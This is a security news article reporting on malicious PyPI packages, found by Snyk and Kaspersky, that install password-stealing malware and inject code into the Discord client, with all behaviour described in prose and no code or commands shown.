Malicious PyPi packages turn Discord into password-stealing malware

Malicious PyPi packages turn Discord into password-stealing malware

A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-sealing backdoor and stealing data from web browsers and Roblox.

The twelve packages were uploaded to the Python Package Index (PyPI) on August 1, 2022, by a user named “scarycoder,” and discovered by researchers at Snyk.

Contrary to the common typo-squatting approach, these packages use their own names and promise various features to promote themselves to interested developers.

Malicious PyPi packages turn Discord into password-stealing malware

Malicious repository on PyPI

The Python packages pretend to be Roblox tools, thread management, and basic hacking modules, but none feature the promised functionality. Instead, the packages install password-stealing malware on developers’ devices.

Unfortunately, this malicious set of PyPi Python packages has not been removed from the open source package repository at the time of writing this, so software developers are still at risk.

A dirty dozen

As part of a new report by Snyk, researchers analyze one of these malicious Python packages named “cyphers,” showing how malicious code hidden in the “setup.py” file is used to install two malware executables from a Discord CDN server, namely “ZYXMN.exe” and “ZYRBX.exe.”

The behavior is the same for all packages in the set, except for “hackerfilelol” and “hackerfileloll,” which use a single malicious executable named “Main.exe.”

The first binary, ZYXMN.exe, is used to steal information from Google Chrome, Chromium, Microsoft Edge, Firefox, and Opera, including stored passwords, browser history, cookies, and search history.

To steal information from browsers, the malware will decrypt the web browser’s local database master key to retrieve cleartext data of the victim’s search history, browsing history, cookies, bookmarks, stored passwords, and stored credit cards. This information is then uploaded to the threat actors via a Discord webhook.

However, even more interesting, the malware will modify the actual JavaScript files used by the Discord client to inject a backdoor that can steal information directly from your Discord account.

To steal data from Discord, the malware modifies the index.js file under the ‘discord_desktop_core’ folder to add the malicious Discord-Injection script. The clients targeted for this injection are Discord, Discord Development, Discord Canary, and Discord PTB (Public Test Build).

Malicious PyPi packages turn Discord into password-stealing malware

Discord injection to run within the app’s context (Snyk)

With the script injected, when Discord is restarted, it will perform a variety of negative behavior, including stealing authentication tokens, Nitro status, billing information, and credit cards.

Malicious PyPi packages turn Discord into password-stealing malware

Discord-Injection project features Source: BleepingComputer

The second malware, ZYRBX.exe, focuses solely on Roblox, attempting to steal the account cookie, user ID, Robux balance, and account Premium status of the online gaming platform and exfiltrate it to a Discord webhook.

Malicious PyPi packages turn Discord into password-stealing malware

ZYRBX’s Discord data-stealing code (Snyk)

More malware on PyPI

Yesterday, Kaspersky published a report where it presented two other PyPi packages that contain info-stealing malware and also modify the Discord client as well.

The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.

After this step, the stealer scans the host’s Downloads, Documents, and Desktop folders to locate 2FA recovery lists, password text files, Discord tokens, Paypal account info, and more.

Malicious PyPi packages turn Discord into password-stealing malware

Scanned items on local folders (Kaspersky)

The malicious duo discovered by Kaspersky are “pyquest” and “ultrarequests,” mimicking projects with millions of downloads and even cloning their code.

Malicious PyPi packages turn Discord into password-stealing malware

Code comparison reveals obfuscated malware-fetching script on cloned project (Kaspersky)

PyPI’s response to malicious package reports appears to be slow, with malicious packages remaining online for days after being reported. This is likely the result of a small team of volunteers with a limited budget being overwhelmed by constant malware uploads.

Unfortunately, this gives more uptime to the malicious packages and increases the chances of software developers becoming victims of this malware.

News Related

OTHER NEWS

Another Jan. 6? Bolsonaro attacks Brazil’s election, raising fears of violence

Brazilians head to the polls on Sunday for a first round of voting that could mark the beginning of the end for Brazilian President Jair Bolsonaro — and experts are ... Read more »

3 keys to a Giants win over the Bears

1. STOP THE RUN The Chicago Bears’ 297 passing yards are the least by a team through three games since 1981. The Bears’ 560 rushing yards rank second in the ... Read more »

Train firm rolls out water spray tech to tackle 'leaves on line' autumnal delays

Around 10 million trees border Britain's rail network dropping thousands of tonnes of leaves onto tracks every autumn, landing the industry with an estimated seasonal bill of £345m. Read more »

Dimensity 9000+ beats all Snapdragon processors on AnTuTu

AnTuTu has today published the list of the most powerful Android smartphones for September in China. The Dimensity 9000+ SoC outperformed all Snapdragon processors and topped the ranking. So, according ... Read more »

Samsung Galaxy A14 renders leaked, reveal barely any changes in design

For smartphones, you don’t usually see any design changes in succeeding models. That’s because it’s hard to make significant changes without adding to the manufacturing cost. In particular, entry-level devices ... Read more »

Escaped inmate from Connecticut captured at his birthday party in Georgia

Forenza Murphy, who escaped a halfway house in August, was caught by police in Georgia at his birthday party. Henry County Sheriff’s Office A fugitive on the run from Connecticut ... Read more »

Jets vs. Steelers: Preview, predictions, what to watch for

An inside look at Sunday’s Jets-Steelers Week 4 matchup in Pittsburgh: Marquee matchup Steelers’ defensive line vs. Jets’ offensive line The Steelers lost their star pass rusher, T.J. Watt, to ... Read more »

KPRC 2 Investigates: Judge reprimands body shop owner for failing to pay back victims

HOUSTON – When the law finally catches up to criminals, they may be sentenced to jail or probation. Sometimes they’re ordered to pay what’s called restitution to reimburse their victims ... Read more »

What channel is Leeds United v Aston Villa on today? Kick off time and how to watch

Leeds United succumbed to defeat last time out against Brentford. Following a turbulent international break, Leeds United will return to action to take on Aston Villa in their first game ... Read more »

Mets turn to easygoing Chris Bassitt in key series finale vs. Braves

ATLANTA — Some pitchers, in the hours before their starts, refuse to speak to others. They visualize. They concentrate. Maybe they put on earbuds and literally block out the noise ... Read more »

What Happened To The Southern Wind On Deadliest Catch?

Discovery/YouTube Discovery’s pulse-pounding reality series “Deadliest Catch” has been on the air for close to two decades now. And over that span, the series has arguably delivered more high-stakes fishing ... Read more »

Rocket League Voice Chat not Working on PC or Xbox

Is your voice chat not working properly in the Rocket League game? Many gamers have reported that they cannot use the Rocket League voice chat feature. This prevents them from ... Read more »

What channel is Man City v Man Utd on today? Kick off time and how to watch Manchester derby on TV

Manchester United face Manchester City this weekend. Credit: Getty. Manchester City and Manchester United do battle today in the Premier League for what is the first derby of the 2022/23 ... Read more »

Buttermilk: Experts weigh in on health benefits, nutrition facts, and more

Buttermilk image Benefits by Faith Seke Buttermilk image Benefits by Julia Rocha Buttermilk image Benefits by Madison Shaw Buttermilk image Side effects by Faith Seke Buttermilk image Side effects by ... Read more »

Op-Ed: As a new Supreme Court term begins, prepare for the law to move even more to the right

As the Supreme Court begins its new term on Monday, it’s clear that the court’s majority is determined to move the law much further to the right. The last term ... Read more »

How to Fix “VT-X Is Not Available (verr_vmx-No-Vmx)” Error in VirtualBox

VT-x or Intel Virtualization Technology allows processors to run virtual machines. It’s no surprise, then, that a “VT-x is not available (VERR_VMX_NO_VMX)” error prevents VirtualBox from functioning correctly. This error ... Read more »

Creation, destruction, sensation: Damien Hirst’s burning desire to destroy art worth £10m

Take two cultural phenomena, both designed to confound us, which are now each worth lots of money: the art of Damien Hirst and the equally infamous non-fungible tokens, or NFTs. ... Read more »

NFL Week 4 predictions: Titans a live underdog vs. Colts

Home team in CAPS: Sunday Titans (+3.5) over COLTS Tennessee has frequently been good to us when occupying the underdog role over the years, and certainly willing to take another ... Read more »

JD.com Founder Richard Liu Settles Rape Allegation Ahead of Trial

Richard Liu, the founder of the JD.com e-commerce company, arranged a settlement with Liu Jingyao, the Minnesota college student who accused the Chinese billionaire of rape back in 2018. The ... Read more »

Chinese billionaire Richard Liu settles civil suit over alleged rape in US a day before the JD.com founder was to face trial

Chinese tech billionaire Richard Liu Qiangdong has reached a settlement with former University of Minnesota student Liu Jingyao, who accused the JD.com founder of rape in 2018, a day before ... Read more »

“That Isn’t Me”: UK Chancellor Tells News Website It Has Picture Of Wrong Man

Britain’s Chancellor of the Exchequer Kwasi Kwarteng Justin Tallis/Getty Images UK newspaper The Mirror has apologised for its “terrible error” after mistakenly including a picture of the wrong person in ... Read more »

Vikings vs. Saints predictions: Odds and picks for early London game

Our NFL betting expert brings you his best Vikings vs Saints predictions and picks for their NFL week 4 match-up, which is live Sunday on NFL Network at 9:30 a.m. ... Read more »

Liz Truss ‘stands by’ tax cuts but admits she should have ‘laid the ground better’ for her mammoth surprise package

LIZ Truss today insisted she “stands by” her bumper tax cuts – but admitted she should have “laid the ground better” for the package. Despite spooking the markets and sending ... Read more »

Where Jeff McNeil stands in NL batting race

ATLANTA — Jeff McNeil’s pursuit of Mets history remains an interesting subplot in these final days of the regular season. The Mets utilityman increased his batting average to .323 by ... Read more »

Railway union chiefs threaten to ruin CHRISTMAS with more crippling strikes disrupting holiday travel plans for millions

RAIL union bosses could ruin Christmas for millions as they threaten crippling strikes over the festive period. It comes after an estimated 2.5million journeys were disrupted after yesterday’s industrial action ... Read more »

Hailey Bieber shows off her incredible figure in a plunging coral midi dress at the Barbara Berlanti Heroes Gala benefiting F*** Cancer campaign

Hailey Bieber attended the Barbara Berlanti Heroes Gala benefiting F*** Cancer, which was held at the Barker Hangar in Santa Monica on Saturday evening. The model, 25, dress to impress ... Read more »

Op-Ed: The quandary of U.S.-trained Chinese scientists: Stay or leave?

Would you train your workers and then squeeze them out by creating a hostile environment? Would you drive out these workers so they can go work for a competitor? The ... Read more »

Concerns grow for boy, 12, who went missing from hospital three days ago as his parents plead for him to come home

CONCERNS are growing for a 12-year-old boy who went missing from hospital three days ago – and his parents are pleading for him to come home. August Petrie, 12, is ... Read more »

Op-Ed: How I nurtured my trans nonbinary child’s path — and learned to grow with him

Two years ago, my then 7-year-old and I were having a date night when I jokingly asked, “Any deep, dark secrets you want to share with me?” E was quiet ... Read more »

How the US-led West plans to take on China in Africa in the race for critical minerals

Worried about their vulnerability to China and Russia, the US and its allies have established a funding initiative for resource-rich African countries to bolster critical mineral supply chains essential for ... Read more »

Prince Andrew is the turd that won’t flush & Charles must kick him out of family NOW, says ex-Royal cop

PRINCE Andrew is the “turd that won't flush” who must be booted out for the sake of the Royal Family's reputation by King Charles III, an ex-Royal cop said. Paul ... Read more »

Brooklyn native sees Aaron Judge pursuit 61 years after Roger Maris

An electric, but uniquely weird vibe engulfed chilly and damp Yankee Stadium on Saturday afternoon. The centerpiece of attention was, of course, the anticipation over Aaron Judge and whether he ... Read more »

Red Bull driver Max Verstappen lashes out at rivals after Formula 1 budget cap breach claims

Red Bull's Max Verstappen was not happy to hear accusations from rival teams that they exceeded the cost cap during the 2021 season. Read more »

Bears bring one true star with them vs. Giants, but he’s no Red Grange

The people were angry. They’d been packed all day into the Polo Grounds — well over 70,000 of them if you counted standing room, the kids who snuck under turnstiles ... Read more »

What Is the Vmmem Process in Windows Task Manager? Here's How to Fix Its High Resource Consumption

What Is the Vmmem Process in Windows Task Manager? Here’s How to Fix Its High Resource Consumption Have you encountered a process called ” Vmmem” in Windows Task Manager? Does ... Read more »

La Microsoft Surface Pro X est à prix cassé, une fois adoptée, vous ne vous en passerez plus

La Surface Pro X de Microsoft est en promotion sur Amazon et cette étonnante tablette convertible se distingue par sa finesse et par sa connectivité 4G+. Profitez de la Surface ... Read more »

Indonesia: what happened in Malang city, East Java as 174 people killed at Arema FC football match stampede

Brawling Arema FC supporters were panicked after police fired tear gas at them (image: AFP/Getty Images) A football game in Indonesia has ended in disaster, after The crush happened among ... Read more »

US extreme skier Hilaree Nelson killed in mountain plunge given traditional Nepalese funeral

Ms Nelson has been described as a "hero, mentor and friend" by her sponsor, The North Face, in an online tribute. Read more »

What did Liz Truss say on Laura Kuenssberg show? What PM said about Kwasi Kwarteng and tax cuts - key quotes

Laura Kuenssberg interviews Prime Minister Liz Truss on the BBC1 current affairs programme, Sunday with Laura Kuenssberg For the first time, Liz Truss has admitted she made mistakes with the ... Read more »

Behind C919: China's path to first self-developed large passenger aircraft

Two C919 aircraft park at the Beijing Capital International Airport, September 13, 2022. /CFP On a field outside the Shanghai Aircraft Manufacturing Center of Commercial Aircraft Corporation of China (COMAC) ... Read more »
Breaking thailand news, thai news, thailand news Verified News Story Network